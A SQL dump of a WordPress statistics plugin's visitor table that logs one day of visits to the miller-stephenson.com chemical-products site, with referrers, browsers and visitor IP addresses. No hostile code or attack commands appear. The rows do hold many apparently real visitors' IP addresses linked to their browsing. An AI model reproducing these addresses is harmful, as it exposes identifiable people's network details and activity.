INSERT INTO `wp_statistics_visitor` VALUES (5660, '2016-10-18', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '184.168.192.61', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5661, '2016-10-18', 'https://www.miller-stephenson.com/product/epon-828/', 'MSIE', 'Windows', '11.0', '', '131.137.245.209', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5662, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '2.93.81.127', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5663, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '31.200.224.31', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5664, '2016-10-18', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '213.254.241.6', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5665, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '83.149.21.220', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5666, '2016-10-18', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '50.62.161.98', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5667, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '85.198.106.6', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5668, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '82.138.10.21', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5669, '2016-10-18', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '98.130.0.237', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5670, '2016-10-18', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '70.168.8.60', '000', 41, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5671, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '37.235.178.119', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5672, '2016-10-18', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '178.169.133.202', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5673, '2016-10-18', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '70.39.157.197', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5674, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '89.19.177.42', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5675, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '95.188.112.1', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5676, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '195.182.133.243', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5677, '2016-10-18', 'https://www.google.ca/', 'Chrome', 'Windows', '53.0.2785.143', '', '207.164.23.18', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5678, '2016-10-18', 'https://www.google.ru/', 'Chrome', 'Windows', '53.0.2785.143', '', '85.114.2.245', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5679, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '109.187.181.93', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5680, '2016-10-18', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '168.215.92.114', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5681, '2016-10-18', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '23.30.128.38', '000', 21, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5682, '2016-10-18', 'https://www.miller-stephenson.com/wp-admin/admin.php?page=quoteup-details-new', 'Chrome', 'Windows', '53.0.2785.143', '', '107.3.95.149', '000', 369, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5683, '2016-10-18', 'https://www.google.com/', 'Chrome', 'Windows', '51.0.2704.84', '', '199.107.68.202', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5684, '2016-10-18', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '199.107.68.202', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5685, '2016-10-18', 'https://www.miller-stephenson.com/product/plastic-glass-metal-cleaner/', 'Safari', 'iPhone', '7.0', '', '199.30.25.94', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5686, '2016-10-18', 'https://www.miller-stephenson.com', 'Safari', 'Macintosh', '10.0', '', '39.38.61.164', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5687, '2016-10-18', 'https://www.google.com.my/', 'Chrome', 'Windows', '53.0.2785.143', '', '93.178.28.226', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5688, '2016-10-18', 'https://www.searchlock.com/', 'Chrome', 'Windows', '44.0.2403.89', '', '198.91.54.90', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5689, '2016-10-18', 'https://www.miller-stephenson.com', 'Safari', 'Macintosh', '9.1.3', '', '76.88.35.111', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5690, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '5.79.217.10', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5691, '2016-10-18', 'https://www.google.com/', 'Safari', 'iPhone', '10.0', '', '70.195.210.60', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5692, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '109.188.124.162', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5693, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '31.223.26.173', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5694, '2016-10-18', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '49.0.2623.112', '', '108.189.74.48', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5695, '2016-10-18', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '72.71.227.191', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5696, '2016-10-18', 'https://www.mschem.com/miller/index.php', 'Chrome', 'Windows', '53.0.2785.143', '', '50.151.36.144', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5697, '2016-10-18', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '49.0.2623.75', '', '12.251.123.42', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5698, '2016-10-18', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '198.208.251.23', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5699, '2016-10-18', 'https://search.yahoo.com', 'Firefox', 'Windows', '45.0', '', '147.105.250.100', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5700, '2016-10-18', 'https://www.miller-stephenson.com/', 'Firefox', 'Windows', '45.0', '', '147.105.250.101', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5701, '2016-10-18', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '18.85.39.198', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5702, '2016-10-18', 'https://r.search.yahoo.com/_ylt=A0LEV78oIgZYKR0AkyEnnIlQ;_ylu=X3oDMTEycDBhOTJiBGNvbG8DYmYxBHBvcwMxBHZ0aWQDQjI3OTVfMQRzZWMDc3I-/RV=2/RE=1476825768/RO=10/RU=https%3a%2f%2fwww.miller-stephenson.com%2fchemicals%2fkrytox-tribosys-finish-line%2ftribosys%2fptfe-dryfilm-lubricants%2f/RK=0/RS=5b_jFf4zjttieQeQwREZMUq6u7Q-', 'Firefox', 'Windows', '49.0', '', '197.254.27.26', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5703, '2016-10-18', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '204.14.86.211', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5704, '2016-10-18', 'https://www.miller-stephenson.com/product/plastic-glass-metal-cleaner/', 'MSIE', 'Windows', '11.0', '', '67.142.113.15', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5705, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Linux', '20.0', '', '204.14.86.211', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5706, '2016-10-18', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.59', '', '197.254.27.26', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5707, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Linux', '31.0', '', '121.200.54.98', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5708, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Linux', '25.0', '', '172.16.105.11', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5709, '2016-10-18', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&cad=rja&uact=8&ved=0ahUKEwj75t--vuTPAhUHJh4KHVHRDrwQFggqMAE&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fkrytox-automotive%2F&usg=AFQjCNFN-xJJWI8wliVZEPi5LFE6Uf-pYQ&bvm=bv.135974163,d.dmo', 'MSIE', 'Windows', '11.0', '', '198.179.121.2', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5710, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '62.28.143.251', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5711, '2016-10-18', 'https://ttsgco.blogfa.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '2.178.136.85', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5712, '2016-10-18', 'https://www.google.com/aclk?sa=L&ai=DChcSEwjk7_PZwOTPAhVWbX4KHQN-AKwYABAA&ei=yykGWPbuGJCQjwP846-gDw&sig=AOD64_2o7UOA6EM6EgovSLXv5D0c4Lc3Jw&rct=j&q=&sqi=2&ved=0ahUKEwi2gPDZwOTPAhUQyGMKHfzxC_QQ0QwIGg&adurl=', 'MSIE', 'Windows', '11.0', '', '98.175.70.147', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5713, '2016-10-18', 'https://www.google.ca/aclk?sa=L&ai=DChcSEwin_cX8wOTPAhVIO4EKHXr0B9QYABAA&sig=AOD64_26lBhooEK_HigODmcJ9-jPXx1Zcw&rct=j&q=&ved=0ahUKEwiH18L8wOTPAhUIHD4KHecVBbU4ChDRDAga&adurl=', 'MSIE', 'Windows', '11.0', '', '141.119.184.130', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5714, '2016-10-18', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.57.169', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5715, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '94.253.12.28', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5716, '2016-10-18', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&ved=0ahUKEwjwiJeDwuTPAhWCSD4KHS3MBBUQFggjMAE&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fplastic-glass-metal-cleaner%2F&usg=AFQjCNHPWy4BoHCEDieQeBhAcZ0emHXcqw', 'MSIE', 'Windows', '11.0', '', '138.254.133.100', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5717, '2016-10-18', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '184.81.166.250', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5718, '2016-10-18', 'https://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1213.5rsu-zb_SdON0wtD4_Ne0cQ4sPtDKhIe3NQgQOvEbKX6RY6dE2YerQ8p_v8wOrNk.12cbed53532e3d5c0dc460a9b26e75bdb453b4d0&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YGftRg9cP1erjBfVTUcXDXk&data=UlNrNmk5WktYejR0eWJFYk1LdmtxbWg4V3VrcVZRaW5qSEV5NjF2QkhsZDhTWUNDSHQwZzhXQkktSlF5d0NvOXh6MWltUlVTSUtvbmFJNXNyUGF0RXRuNVRwNHhxTThucS01dWlodENxTmltMGkxdFUwakZXN3lRVk1MQldKLXFvYmUtN24wV2ZtNUtJbGNxY09fd1VR&b64e=2&sign=b7961abc8b788e764e534c71d74ead92&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQXbYQp9t5VF6E1pW-uC8e8151xksyUSdJH8urtpzG8MeqgIqp76uePAxpxTjln6XRs612cmzEQHOiWaVFhw5myVQXjU9ujs7LLtm10DlNZHapwcJBm4qY2sJUMJnnFkhlqBv1bGzbLOl&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCUano4BEc9IEfF27660Q067FALMMTmu8A9lIo1KzV2xI_eZSiuUCSnIb0_YGJZhmIzaJuYyK5PlNe-TQwajQYm9Ehj3B4AWris&l10n=ru&cts=1476799954169&mc=5.44296746099', 'Chrome', 'Windows', '31.0.1650.63', '', '195.91.224.113', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5719, '2016-10-18', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '10.0', '', '172.16.11.116', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5720, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '81.200.82.163', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5721, '2016-10-18', 'https://www.miller-stephenson.com/chemicals/krytox-tribosys-teflon-lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/krytox-gpl-200-207/', 'Safari', 'iPhone', '7.0', '', '65.55.210.221', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5722, '2016-10-18', 'https://www.google.co.uk/', 'Chrome', 'Windows', '53.0.2785.143', '', '81.155.77.150', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5723, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '213.138.95.10', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5724, '2016-10-18', 'https://www.bing.com/search?q=ms-122xd+mil+spec&src=IE-SearchBox&FORM=IESR02', 'MSIE', 'Windows', '11.0', '', '63.96.14.2', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5725, '2016-10-18', 'https://www.bing.com/search?q=miller+stephenson&qs=LS&pq=miller+ste&sc=8-10&sp=1&cvid=7300D6FA6595474096A69967ECF657F0&FORM=QBLH&adlt=strict', 'MSIE', 'Windows', '11.0', '', '134.223.230.152', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5726, '2016-10-18', 'https://www.google.com/', 'Chrome', 'Windows', '52.0.2743.116', '', '12.30.47.234', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5727, '2016-10-18', 'https://www.bing.com/search?q=miller+stephenson&form=PRDLC1&src=IE11TR&pc=DCTE', 'MSIE', 'Windows', '11.0', '', '207.238.166.197', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5728, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '2.134.96.76', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5729, '2016-10-18', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '129.162.1.213', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5730, '2016-10-18', 'https://www.google.com/aclk?sa=L&ai=DChcSEwj8sL7nzOTPAhVQOoEKHUU0DtIYABAA&sig=AOD64_0gToZ20VlTGXfzEfj3ZDDwc9Niow&rct=j&frm=1&q=&ved=0ahUKEwiJ3LjnzOTPAhVBySYKHYxPAKYQ0QwIHA&adurl=', 'MSIE', 'Windows', '10.0', '', '73.27.7.213', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5731, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '31.1.174.252', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5732, '2016-10-18', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '50.203.140.222', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5733, '2016-10-18', 'https://mmr.mschem.com/miller/pdf/MS-122AD.pdf', 'Chrome', 'Windows', '53.0.2785.143', '', '199.89.130.52', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5734, '2016-10-18', 'https://www.google.com/aclk?sa=L&ai=DChcSEwiFhOTozeTPAhUQm34KHW02A-QYABAA&ei=jDcGWJyGEYSW0gLY9pDIDA&sig=AOD64_0_RPgHGACLCrVlPhXqeaaUcP3S5g&rct=j&q=&sqi=2&ved=0ahUKEwic_ODozeTPAhUEi1QKHVg7BMkQ0QwIHg&adurl=', 'MSIE', 'Windows', '11.0', '', '216.14.37.146', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5735, '2016-10-18', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '67.59.79.8', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5736, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '46.42.17.108', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5737, '2016-10-18', 'https://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1213.R2IBnE6sSm2QknGt76wrAHAr-X-YMKRFvjLqA3pCJ6kpA5zDIxC5VhxZiIdoDfMm.09ecbb5c06adc8b8eb9a0f02bd6148fde05808e8&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YHRNgn3KsbHJbmUkku86_mY&data=UlNrNmk5WktYejR0eWJFYk1LdmtxbWg4V3VrcVZRaW5qSEV5NjF2QkhsZDhTWUNDSHQwZzhXQkktSlF5d0NvOXdBQ1E3VkJaMGdpRUotb0JwdlYxNDRaT2xrMko5MkJOSndIY1lNWnhLbndsN2g5WTRrZXlVMTJZT3JpRnlJTHNnNnl1ZzFkbFFoaDlYeXB3VGpOZDdjZFRiR0xmdkNmdw&b64e=2&sign=5516b7e4d736a8d3c607e884a4cacc77&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQa9gkHE_3kbiqL89QFFymPc2IyciR9m1OJvgMkG6A_nrzVSJvd37ARSHa_pLxLZOEXi6Pc8AXRiUvF9q6eSBqDkchwLvZvKXB9PXiVkXLKx-fDQ1NnXkDdcd4qs5KJceSVSXmWxpY9q5&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCW9Fv-f0vevmwFQFbhAmw-KzBd79wSXIFZQLMpahJJAsNC2tB-NUt7Jl-Fv7JsVwybgfcyyfI8RW3SOCgy4-oDLOgyNP273bEI&l10n=ru&cts=1476801061468&mc=6.1237745165', 'Opera Next', 'Windows', '17.0.1241.53', '', '176.195.101.241', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5738, '2016-10-18', 'https://www.miller-stephenson.com/chemicals/release-agents/ptfe-release-agents/', 'MSIE', 'Windows', '11.0', '', '134.223.230.155', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5739, '2016-10-18', 'https://www.bing.com/', 'MSIE', 'Windows', '11.0', '', '24.39.119.102', '000', 19, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5740, '2016-10-18', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '54.0.2840.59', '', '202.62.91.154', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5741, '2016-10-18', 'https://www.google.com/', 'Edge', 'Windows', '14.14393', '', '50.151.36.144', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5742, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '6.0.2', '', '180.76.15.29', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5743, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '176.215.7.102', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5744, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '37.99.1.114', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5745, '2016-10-18', 'https://www.google.co.ve/', 'Chrome', 'Windows', '53.0.2785.143', '', '186.167.251.246', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5746, '2016-10-18', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '174.193.0.85', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5747, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '212.96.109.241', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5748, '2016-10-18', 'https://www.google.com', 'Firefox', 'Windows', '45.0', '', '134.223.116.151', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5749, '2016-10-18', 'https://www.google.ca/', 'Chrome', 'Windows', '53.0.2785.143', '', '209.239.28.57', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5750, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '37.144.183.206', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5751, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '95.27.115.124', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5752, '2016-10-18', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '41.190.2.129', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5753, '2016-10-18', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '213.254.241.4', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5754, '2016-10-18', 'https://www.google.com/aclk?sa=L&ai=DChcSEwik8Krt1eTPAhWKL4EKHWHgCNAYABAA&sig=AOD64_3Ev-_CryarkUE-T9nO60kMMEVA1A&rct=j&q=&ved=0ahUKEwiT0qXt1eTPAhUG5SYKHcT0AAUQ0QwIGg&adurl=', 'MSIE', 'Windows', '11.0', '', '134.223.230.156', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5755, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '85.140.6.30', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5756, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '213.87.151.140', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5757, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '62.133.162.46', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5758, '2016-10-18', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '123.125.67.228', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5759, '2016-10-18', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '41.0.2228.0', '', '138.201.28.138', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5760, '2016-10-18', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '49.0.2623.75', '', '24.63.154.108', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5761, '2016-10-18', 'https://www.google.fr/', 'Chrome', 'Windows', '53.0.2785.143', '', '80.15.106.98', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5762, '2016-10-18', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '71.235.209.180', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5763, '2016-10-18', 'https://www.google.com/', 'Safari', 'Macintosh', '10.0', '', '50.78.202.1', '000', 19, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5764, '2016-10-18', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '73.185.209.244', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5765, '2016-10-18', 'https://www.bing.com/search?q=epikure+w&src=IE-TopResult&FORM=IETR02&conversationid=&adlt=strict', 'MSIE', 'Windows', '11.0', '', '205.254.147.8', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5766, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '79.172.30.66', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5767, '2016-10-18', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '204.79.180.136', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5768, '2016-10-18', 'https://www.miller-stephenson.com/krytox-prepare-bearings/', 'MSIE', 'Windows', '9.0', '', '204.79.180.135', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5769, '2016-10-18', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '10.0', '', '24.63.154.108', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5770, '2016-10-18', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.48.131', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5771, '2016-10-18', 'https://www.miller-stephenson.com/', 'Firefox', 'Windows', '3.5.2', '', '67.217.35.25', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5772, '2016-10-18', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '208.104.48.10', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5773, '2016-10-18', 'https://www.google.com/aclk?sa=L&ai=DChcSEwjCndWh3eTPAhUNn34KHTFNCooYABAA&sig=AOD64_2hJCBcMPCSvuvF3jsA0fN7Fjsuwg&rct=j&q=&ved=0ahUKEwiC89Gh3eTPAhXGslQKHXQyDpUQ0QwIGg&adurl=', 'MSIE', 'Windows', '11.0', '', '138.163.128.42', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5774, '2016-10-18', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '138.103.17.19', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5775, '2016-10-18', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.59', '', '65.209.181.185', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5776, '2016-10-18', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '107.0.105.65', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5777, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '194.154.73.150', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5778, '2016-10-18', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '49.0.2623.112', '', '67.211.124.2', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5779, '2016-10-18', 'https://www.google.com/aclk?sa=L&ai=DChcSEwjwp8TW3uTPAhWNPIEKHWzKDtIYABAF&sig=AOD64_2d7ERODZ-fLcFRwgM_FB42DlVCGw&rct=j&q=&ved=0ahUKEwiWu8DW3uTPAhWFOCYKHQBCAeUQ0QwIkAE&adurl=', 'MSIE', 'Windows', '11.0', '', '192.168.41.166', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5780, '2016-10-18', 'https://www.mides-kos.com/wp/wp-login.php', 'Mechanize', 'Unknown', '2.7.3', '', '89.36.66.227', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5781, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '4.0', '', '107.170.107.176', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5782, '2016-10-18', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '129.63.253.15', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5783, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '178.67.60.154', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5784, '2016-10-18', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '65.196.116.115', '000', 2, 0); 
